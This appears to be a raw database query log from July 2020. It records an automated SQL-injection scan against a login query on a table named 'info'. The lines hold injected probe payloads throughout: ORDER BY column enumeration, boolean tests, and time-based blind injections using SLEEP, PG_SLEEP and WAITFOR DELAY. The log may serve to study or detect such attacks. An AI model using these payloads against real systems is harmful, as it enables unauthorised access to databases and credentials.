Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 1-- mSwT" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1) ORDER BY 5865-- QtPc" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- ehWq" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 9262-- waWT" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 1-- Djse" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1 ORDER BY 2970-- VfhN" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 1-- Zrbe" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1') ORDER BY 6963-- jhiL" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 1-- DbdQ" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1' ORDER BY 1168-- iNDA" AND pass=1
Sat 18 Jul 2020 10:09:02 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 2566=8557 AND (7996=7996
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 5049=1394
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 3122=5107-- pGFp
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 8097=5990 AND ('jlOE'='jlOE
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 5891=1123 AND 'ECZJ'='ECZJ
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=(SELECT (CASE WHEN (3212=7731) THEN 1 ELSE (SELECT 7731 UNION SELECT 5894) END))
Sat 18 Jul 2020 10:09:03 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND (SE
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 3865 FROM (SELECT(SLEEP(5)))pPja)
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND (SELECT 3865 FROM (SELECT(SLEEP(5)))pPja)-- GVFD
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND (SELECT 3865 FROM (SELECT(SLEEP(5)))pPja) AND ('kgtr'='kgtr
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND (SELECT 3865 FROM (SELECT(SLEEP(5)))pPja) AND 'PBuy'='PBuy
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) AND 3242=(SELECT 3242 FROM PG_SLEEP(5)) AND (4763=4763
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 3242=(SELECT 3242 FROM PG_SLEEP(5))
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 AND 3242=(SELECT 3242 FROM PG_SLEEP(5))-- nfqX
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') AND 3242=(SELECT 3242 FROM PG_SLEEP(5)) AND ('jikN'='jikN
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' AND 3242=(SELECT 3242 FROM PG_SLEEP(5)) AND 'MIQG'='MIQG
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) WAITFOR DELAY '0:0:5' AND (9464=9464
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') WAITFOR DELAY '0:0:5' AND ('vaCp'='vaCp
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' WAITFOR DELAY '0:0:5' AND 'PbYt'='PbYt
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 1-- mHrz
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1) ORDER BY 9581-- GHiV
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- SbVL
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 3122-- AOIG
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1-- yLqU
Sat 18 Jul 2020 10:09:04 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1 ORDER BY 1382-- jwZT
Sat 18 Jul 2020 10:09:05 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 1-- AVXY
Sat 18 Jul 2020 10:09:05 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1') ORDER BY 4611-- raQl
Sat 18 Jul 2020 10:09:05 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 1-- JnyX
Sat 18 Jul 2020 10:09:05 AM IST: SELECT * FROM info WHERE uid="1" AND pass=1' ORDER BY 8066-- ddjF
